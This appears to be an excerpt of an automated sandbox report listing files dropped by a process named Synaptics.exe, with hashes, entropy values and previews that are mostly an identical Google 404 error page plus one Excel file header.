                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2656263109502595
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0YQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                              MD5:5FEBAFDA11F567E0C5AEC9E102E5A26D
                                                                                                              SHA1:8E455E155F4310B6506E917FB040F571E96EC1DE
                                                                                                              SHA-256:32A28810A75BFB4749614A8A893D436106FAF2F6C3C44B192C6836FE390A5B43
                                                                                                              SHA-512:004A7310B9A8BC39431234C4B94601F146D3CB042D5202FD6049CD5756D8F0285962A62072B8E02FAAFE63E61B72BA2DE7F9710E5B749867B769777CFA83533F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VPqjfoF0wELgNXV1CFhV4g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264891589807313
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+04nISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bI+pAZewRDK4mW
                                                                                                              MD5:4C2AEF11A227FA746A3C379E5B7BB7C4
                                                                                                              SHA1:AD7ABEA10859D36680E142ACA6404F2A55AB28B3
                                                                                                              SHA-256:64364A3C51F05D4A1CF5E360339633B2408CAA4CBB4F289D8579783BA2607F0A
                                                                                                              SHA-512:A55F072E1B97CE7ECF755405F6D23E4CFF8A36774980D960C263983A3C4CFC4BAA110EB4D16E5EF5BBE2C748EDCF2F5C92537BD4DF017A3D8C8AEA12AFA5029C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="koYZHLHa99uc483b_CbpDQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258078439637681
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                              MD5:55B339AD50ED226270209568A8904CD8
                                                                                                              SHA1:9969CEB7193B6D37731B3FCE8B0EF4DAB600A1C4
                                                                                                              SHA-256:E4374989FCC1F324E59E62038F0BAD86BFC5EA28D3EB6DA2DB6B7F578E2A2A55
                                                                                                              SHA-512:6EA79E059E3C19E296B445F64BE3A679380F278EC5A5B7CCC97724EC9FD7EA6E2ACC209B9B116694C40409144E209B257C098DF126448BA238610C2491E03A8F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="z7b-JpqvhiKfWeiiVCnB1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.270581950856467
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wzHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tH+pAZewRDK4mW
                                                                                                              MD5:0622C83F7CBDAC9834CA0E26F8709DDD
                                                                                                              SHA1:506FDF3B1DBFB57BC0FAD2A652855973B9643AA0
                                                                                                              SHA-256:9371FBD9CCAE01D2E62F69B4648B7F540C128085D1AFBE45E8EBFDF2B1D97282
                                                                                                              SHA-512:699D527FE1E7C408F0C2588657025FF6281CA84324A22703FE4AABBD63D3FE09E97D3AFCAF197F7C5FB53A79603E52F06EB9308C089AD0A055E0B8993163B091
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KDKa9s4tSf2EVqLgqXgRWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261114317412132
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0QkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                              MD5:395723895DA2D3AB739995712E96EB19
                                                                                                              SHA1:31C6D300B5A354713E76241CFB0276D41034A78B
                                                                                                              SHA-256:703BAB017981B687EBE06578AABF41AE7A40F03BDFFD27F925F6141DB66191C4
                                                                                                              SHA-512:87DCE722ACB965EAC209AAFF10AFEC68ACDB7015F7A794D5BE2D4BE4EC2C55F7D8F25C94562AB449DE39FAB51F3A1415282663480791A794D033276FE1671664
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OG_Ve__D6NaF9AiCopmIow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.28360863149319
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0PhDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mD+pAZewRDK4mW
                                                                                                              MD5:50ACF4A348C470DDAB040F52D42732ED
                                                                                                              SHA1:B0F3F9BA9828DD522B35998A8EAD427AE120BC6F
                                                                                                              SHA-256:C3D8E20F44279D2D31C69FFB0295F70EEE5C2DB2C94410145BA8392B1ADEB6BE
                                                                                                              SHA-512:D1A850FFD62EED9436C7519C016579C93351D98478DA6DBAAD994F82AB3C185920B733F71F18726707DB47575F21D2B2E3FFB1C81ACDED3E31E7F4FED1162646
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AQQjM3mCtI7UfjDLOIM0XA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.268495234942767
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+04DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fD+pAZewRDK4mW
                                                                                                              MD5:8F403BDA45B339A51FC971E475AB6BFE
                                                                                                              SHA1:16C1421D366FDD6799BD3B982A162526D7260CD6
                                                                                                              SHA-256:2D83943CE59F521D5F2E3F09DD2AC414B8AC5A38792035227665E8AA67055DF8
                                                                                                              SHA-512:BBC1C4AE58AD664A5C02EB4C643334697BE0F0D3DB869D9D3FA3531F05F6A35A7054FB8E30BE19260E0EBFE8BB4BC2BD12A3EEC0DC42EB6AA223C3FDEDA1E671
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OU8HQQiz6jy0ejFG3eEv_g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.269290167657719
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0oAMbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4Mb+pAZewRDK4mW
                                                                                                              MD5:E93821C24F210CB0B5FEEB93C192233E
                                                                                                              SHA1:347FC56EEC2D60A434E4B2F34D087AFC1C454482
                                                                                                              SHA-256:10BF8D898098334160533792CCE6DB874164CDCF8E87B7DD7A068058C3EF4688
                                                                                                              SHA-512:3AA4284D1AC87A1E506820D558DDA645A9BB85D7DFBC5AEB2E19C958741DCB97523BEB74BFEC4D94A7E310C9935CDD5AD4FB76DD478500A76EE9AF255663CFBF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="afgGjpwCZ97DSSq9QUwjjw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2541349407570515
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                              MD5:B7D7AA0E13BE2D43FFD9A95E053164D0
                                                                                                              SHA1:08E507139C3832273E0AB4556293FE12D6D6B545
                                                                                                              SHA-256:94695793E15E03DE1A76FD9F244D0361F37B17B7245A9B413FD1EE8A3272AD2D
                                                                                                              SHA-512:A60623E8C244CAC0936EA2704461CB177C4690DC04A7C02350211A529A0D0C79D0A76205A3EB6A41EB08500CF2E9CE522E4D875797717A59EF685E21C5D5F800
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WygBg0GtFsNj_ryG8pFLcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2644452079545925
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0YoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vo+pAZewRDK4mW
                                                                                                              MD5:5D38E807F9C39DC40638E071B7A2A669
                                                                                                              SHA1:1486BB037E308F6119537FA2B4730C436CBD8974
                                                                                                              SHA-256:F29784C8D7E2E1E1212B76F93F485406EABF726AEED93E43C7C8D60A4207A8E1
                                                                                                              SHA-512:B88D8E9C25A5A8651F6BE9B17C90A24A4454C191AC55B3D50BC1F4DDCFDAF77C2D3F70538D69735F352CF3A092B9FD5183913419B3A2A51AE0A394B6ECE859AA
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GHRnLOdCz0vscFB1pIqahQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258486313550375
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0LlSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+el+pAZewRDK4mW
                                                                                                              MD5:6C9844B6A674F34B77569CFDC5A0651B
                                                                                                              SHA1:01B35D9A2DD849E4DFB0B7988FCD08814B2E5820
                                                                                                              SHA-256:EAFABC9AD5B7B2A7FA835FB7788B1DEFEA450730177580420292ED68EE10A266
                                                                                                              SHA-512:3C3FAF708FE0403254E0EEEDA261B11E6FB3AA2434859E5745B4B53288F953320A78E169555539AEA80A1A0E2E025893264577B9D9EEFE2A39F7DC22210FD2BB
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="34k2e-HtO3AwDRgjwevLJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254803693266374
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0uKSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xK+pAZewRDK4mW
                                                                                                              MD5:A52D40786B0955074E3967B82A40CF90
                                                                                                              SHA1:B39EDA44FE2BDCF79355AE96F33173CAB0FCD071
                                                                                                              SHA-256:CAF476D16BC849496210ABCE61E5877225013AA523D78D163F47F9677300A5F7
                                                                                                              SHA-512:FD945A3A5E2F0C40216EF0B5494D1A71EFE27698B028631E55A31AD990C42C1D5177BA17C1ED7FAB05FB763B6644828E25048FD37A880AFDDE1853C9B2B42BD7
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uePZudzsHcwA37d4FamvzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264815641107366
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                              MD5:1735AF1114D6B7AFFEB4A8E90B4C131C
                                                                                                              SHA1:2CCDD172A399604F119963B81E4FCEA1C81E9B60
                                                                                                              SHA-256:8B489EAA96C0EB91C487FE9B0F4602E30035D212AE61526E8359CE6084A0A707
                                                                                                              SHA-512:543A682DFBAF1E9B9AF446696598F13D6AE9D091674732CB5A3D59F0CF08077BF493C1204A2BBAA93C777FE04C14C676DFEF55EB1F082F75C994073B8383E961
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h5vkZUF2KNUhCH44se4lYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264692986414024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                              MD5:8A1437B5CFB7233C43AFE98AAE13D403
                                                                                                              SHA1:6CB52F3A58BF6751A98D41C3E127ADF1045AE2AE
                                                                                                              SHA-256:17261B4869D7A23C0F1D1C5B7754FDA476A977CDB4B058CDB6895170E0D6A020
                                                                                                              SHA-512:11DDCB07F2D5AA991B22C888F601AB1BE4E450498697DE6CBF87DBC77396F0C880BEC598B747993B5A1027EC1C05E81B0D2CDBC3C47155FE4B5E6E504D146907
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0EA_Z0rWf8pEPB1nbY_UKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267939147361346
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0oVSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fV+pAZewRDK4mW
                                                                                                              MD5:7A166138917A2C994D9F4953E489C094
                                                                                                              SHA1:9BD02600C682F0AC757324D8F1A4B97F3846D2EF
                                                                                                              SHA-256:E9241F09D405AE6158148B5DAFD8E2278442963CDE65293EE76F403041E767EF
                                                                                                              SHA-512:8F8EEF5385EE4BDB562B295E1773CC870D59C52C0A2FDDA21FA87A2057D60ACA1CF5BB06B67CD6BB4BD753983C0327AAA32ED8F4F4A5F3D9ABFBA8F9BDD27B3B
                                                                                                              Malicious:false
